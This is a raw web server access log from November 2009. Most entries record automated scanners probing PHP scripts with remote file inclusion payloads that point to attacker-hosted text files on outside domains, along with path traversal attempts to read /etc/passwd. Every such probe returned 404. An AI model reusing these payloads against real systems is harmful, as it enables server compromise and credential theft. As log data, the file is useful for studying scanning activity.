207.244.223.5 - - [14/Nov/2009:00:05:46 -0600] "GET /logs/access_log.1242432000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.244.223.5 - - [14/Nov/2009:00:05:46 -0600] "GET /logs/access_log.1235692800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.244.223.5 - - [14/Nov/2009:00:05:46 -0600] "GET /logs/access_log.1244592000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.244.223.5 - - [14/Nov/2009:00:05:46 -0600] "GET /logs/access_log.1242000000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.232.167.73 - - [14/Nov/2009:00:07:44 -0600] "GET /logs//conlib/local.php?cfg[path][contenido]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""-"
72.232.167.73 - - [14/Nov/2009:00:07:44 -0600] "GET //conlib/local.php?cfg[path][contenido]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""-"
72.232.167.73 - - [14/Nov/2009:00:07:44 -0600] "GET /logs//conlib/local.php?cfg[path][contenido]=./../../../../../../../../etc/passwd HTTP/1.1" 404 305 "-""-"
72.232.167.73 - - [14/Nov/2009:00:07:44 -0600] "GET //conlib/local.php?cfg[path][contenido]=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""-"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs/access_log.1247097600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs/access_log.1253145600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs/access_log.1244764800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs/access_log.1238457600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:03 -0600] "GET /logs/access_log.1240704000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:04 -0600] "GET /logs/access_log.1236988800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:09:04 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:36 -0600] "GET /logs//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:36 -0600] "GET /logs/access_log.1232064000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:37 -0600] "GET //skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:55 -0600] "GET /logs/access_log.1233532800//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:55 -0600] "GET /logs/access_log.1235088000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:55 -0600] "GET /logs/access_log.1231632000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:56 -0600] "GET /logs/access_log.1230854400//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:56 -0600] "GET /logs/access_log.1238284800//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:09:58 -0600] "GET /logs/access_log.1234828800//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:12 -0600] "GET /logs/access_log.1241568000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:12 -0600] "GET /logs/access_log.1232150400//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:12 -0600] "GET /logs/access_log.1247529600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:13 -0600] "GET /logs/access_log.1232582400//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:14 -0600] "GET /logs/access_log.1247270400//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:10:14 -0600] "GET /logs/access_log.1235520000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:10:16 -0600] "GET /logs/access_log.1253145600//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:10:19 -0600] "GET /logs/access_log.1251676800//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:10:19 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1247097600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1253145600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1240704000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1238457600//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1244764800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
151.1.160.80 - - [14/Nov/2009:00:10:49 -0600] "GET /logs/access_log.1236988800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1230768000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1253145600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1230336000//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1247011200//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1230595200//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1230681600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1237161600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1248134400//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1234569600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1247875200//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1251244800//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:08 -0600] "GET /logs/access_log.1231891200//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:00:11:09 -0600] "GET /logs/access_log.1246665600//skin/happycast_category_bluishgreen/setup.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:11:58 -0600] "GET /logs/access_log.1250899200//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:12:08 -0600] "GET //error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:12:08 -0600] "GET /logs//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:13:06 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:13:06 -0600] "GET /logs/access_log.1241222400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:13:06 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:13:15 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:13:16 -0600] "GET /logs/access_log.1253145600//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:13:16 -0600] "GET /logs/access_log.1251676800//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:16 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:16 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:16 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:20 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:20 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:20 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:13:20 -0600] "GET /logs//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:34 -0600] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:13:35 -0600] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://neox.com.ua/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.183 - - [14/Nov/2009:00:14:55 -0600] "GET /logs/access_log.1217894400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.211 - - [14/Nov/2009:00:15:25 -0600] "GET /logs/access_log.1135296000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.199.232.112 - - [14/Nov/2009:00:16:29 -0600] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:29 -0600] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:29 -0600] "GET /logs/access_log.1250294400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:35 -0600] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:35 -0600] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:35 -0600] "GET /logs/access_log.1250294400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:38 -0600] "GET /logs/access_log.1249948800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:16:42 -0600] "GET /logs/access_log.1249948800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:17:23 -0600] "GET //error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:17:23 -0600] "GET /logs/access_log.1250899200//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:17:26 -0600] "GET /logs//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:17:33 -0600] "GET /logs/access_log.1249516800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:17:38 -0600] "GET /logs/access_log.1249516800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:18:59 -0600] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:18:59 -0600] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:18:59 -0600] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
203.253.204.218 - - [14/Nov/2009:00:19:08 -0600] "GET ///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.253.204.218 - - [14/Nov/2009:00:19:25 -0600] "GET /logs///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:31 -0600] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:31 -0600] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:31 -0600] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:39 -0600] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:40 -0600] "GET /logs/access_log.1242259200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://babem.net/zfxid1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:45 -0600] "GET /logs//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:45 -0600] "GET //bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:45 -0600] "GET /logs/access_log.1233705600//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:46 -0600] "GET //bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:46 -0600] "GET /logs/access_log.1233705600//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:46 -0600] "GET /logs//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:49 -0600] "GET /logs/access_log.1233878400//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
116.127.121.116 - - [14/Nov/2009:00:19:50 -0600] "GET /logs/access_log.1233878400//bbs.lib.inc.php?site_path=http://shop.kbench.com/upload/patch/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:50 -0600] "GET //admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:50 -0600] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:50 -0600] "GET /logs//admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:52 -0600] "GET //admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:52 -0600] "GET /logs//admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:19:52 -0600] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://babem.net/zfxid1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.213.177.58 - - [14/Nov/2009:00:19:57 -0600] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.213.177.58 - - [14/Nov/2009:00:19:57 -0600] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
89.171.190.107 - - [14/Nov/2009:00:19:58 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:19:58 -0600] "GET /logs//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:19:58 -0600] "GET /logs/access_log.1250899200//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.253.204.218 - - [14/Nov/2009:00:20:16 -0600] "GET /logs/access_log.1250294400///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
65.55.110.147 - - [14/Nov/2009:00:20:33 -0600] "GET /logs/access_log.1159228800 HTTP/1.1" 200 2624 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
124.217.226.100 - - [14/Nov/2009:00:20:47 -0600] "GET /logs/access_log.1234224000/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
124.217.226.100 - - [14/Nov/2009:00:20:47 -0600] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.217.226.100 - - [14/Nov/2009:00:20:47 -0600] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://maniacos.net/_vti_tmp?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:20:49 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:20:55 -0600] "GET /logs//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:20:55 -0600] "GET /logs/access_log.1250899200//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:16 -0600] "GET //include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:16 -0600] "GET /logs//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:16 -0600] "GET /logs/access_log.1244937600//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:16 -0600] "GET /logs/access_log.1247270400//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:19 -0600] "GET //include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:19 -0600] "GET /logs//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
